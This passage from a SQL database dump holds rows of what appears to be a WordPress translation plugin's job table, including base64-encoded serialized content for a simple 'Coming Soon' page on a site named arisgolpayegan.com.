(112, 273, 9, 0, 0, '', '', 0, '', '2022-10-26 08:56:20', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(113, 275, 9, 0, 0, '', '', 0, '', '2022-10-26 08:56:29', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(114, 276, 9, 0, 0, '', '', 0, '', '2022-10-26 08:56:29', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(115, 278, 9, 0, 0, '', '', 0, '', '2022-10-26 09:01:53', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(116, 279, 9, 0, 0, '', '', 0, '', '2022-10-26 09:01:53', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(117, 281, 9, 0, 0, '', '', 0, '', '2022-10-26 09:01:57', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(118, 282, 9, 0, 0, '', '', 0, '', '2022-10-26 09:01:57', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(119, 284, 9, 0, 0, '', '', 0, '', '2022-10-26 09:02:02', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(120, 285, 9, 0, 0, '', '', 0, '', '2022-10-26 09:02:02', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(121, 287, 9, 0, 0, '', '', 0, '', '2022-10-26 09:02:06', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(122, 288, 9, 0, 0, '', '', 0, '', '2022-10-26 09:02:06', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(123, 290, 9, 0, 0, '', '', 0, '', '2022-10-26 09:07:46', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(124, 291, 9, 0, 0, '', '', 0, '', '2022-10-26 09:07:46', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(127, 296, 9, 0, 0, '', '', 0, '', '2022-10-26 09:24:07', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(128, 297, 9, 0, 0, '', '', 0, '', '2022-10-26 09:24:07', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(129, 299, 9, 0, 0, '', '', 0, '', '2022-10-26 10:06:26', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(130, 300, 9, 0, 0, '', '', 0, '', '2022-10-26 10:06:26', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(131, 302, 9, 0, 0, '', '', 0, '', '2022-10-26 10:06:29', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(132, 303, 9, 0, 0, '', '', 0, '', '2022-10-26 10:06:29', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(133, 305, 9, 0, 0, '', '', 0, '', '2022-10-27 05:59:10', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(134, 306, 9, 0, 0, '', '', 0, '', '2022-10-27 05:59:10', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(135, 308, 9, 0, 0, '', '', 0, '', '2022-10-27 05:59:18', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(136, 309, 9, 0, 0, '', '', 0, '', '2022-10-27 05:59:18', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(137, 319, 9, 0, 0, '', '', 0, '', '2022-10-27 08:39:03', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(138, 320, 9, 0, 0, '', '', 0, '', '2022-10-27 08:39:03', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(139, 322, 9, 0, 0, '', '', 0, '', '2022-10-27 08:39:07', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(140, 323, 9, 0, 0, '', '', 0, '', '2022-10-27 08:39:07', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(141, 325, 9, 0, 0, '', '', 0, '', '2022-10-27 08:39:11', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(142, 326, 9, 0, 0, '', '', 0, '', '2022-10-27 08:39:11', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(143, 328, 10, 1, 0, '311841a85c32c0fa6b141bd251ed5508', 'local', 2, 'a:4:{s:3:\"url\";s:37:\"http://arisgolpayegan.com?page_id=351\";s:5:\"title\";s:11:\"coming soon\";s:8:\"contents\";a:6:{s:11:\"original_id\";a:2:{s:9:\"translate\";i:0;s:4:\"data\";i:351;}s:5:\"title\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:16:\"Y29taW5nIHNvb24=\";s:6:\"format\";s:6:\"base64\";}s:4:\"body\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:300:\"PGgxPjwvaDE+DQo8aDE+PC9oMT4NCjxoMSBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+Q29taW5nIFNvb248L2gxPg0KPGgyIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij5UaGFuayB5b3UgZm9yIHlvdXIgcGF0aWVuY2UuPC9oMj4NCiZuYnNwOw0KDQombmJzcDsNCg0KJm5ic3A7DQo8aDIgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPkFyaXMsIE5hdHVyYWwgVGFzdGU8L2gyPg==\";s:6:\"format\";s:6:\"base64\";}s:7:\"excerpt\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:4:\"t_19\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:12:\"T3B0aW9uYWw=\";s:6:\"format\";s:6:\"base64\";}s:8:\"tdesc_19\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}}s:4:\"type\";s:4:\"post\";}', '2022-10-30 06:56:37', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(144, 329, 10, 1, 0, '311841a85c32c0fa6b141bd251ed5508', 'local', 2, 'a:4:{s:3:\"url\";s:37:\"http://arisgolpayegan.com?page_id=351\";s:5:\"title\";s:11:\"coming soon\";s:8:\"contents\";a:6:{s:11:\"original_id\";a:2:{s:9:\"translate\";i:0;s:4:\"data\";i:351;}s:5:\"title\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:16:\"Y29taW5nIHNvb24=\";s:6:\"format\";s:6:\"base64\";}s:4:\"body\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:300:\"PGgxPjwvaDE+DQo8aDE+PC9oMT4NCjxoMSBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+Q29taW5nIFNvb248L2gxPg0KPGgyIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij5UaGFuayB5b3UgZm9yIHlvdXIgcGF0aWVuY2UuPC9oMj4NCiZuYnNwOw0KDQombmJzcDsNCg0KJm5ic3A7DQo8aDIgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPkFyaXMsIE5hdHVyYWwgVGFzdGU8L2gyPg==\";s:6:\"format\";s:6:\"base64\";}s:7:\"excerpt\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:4:\"t_19\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:12:\"T3B0aW9uYWw=\";s:6:\"format\";s:6:\"base64\";}s:8:\"tdesc_19\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}}s:4:\"type\";s:4:\"post\";}', '2022-10-30 06:57:41', 0, NULL, NULL, NULL, 1, NULL, NULL, 0);

-- --------------------------------------------------------

--
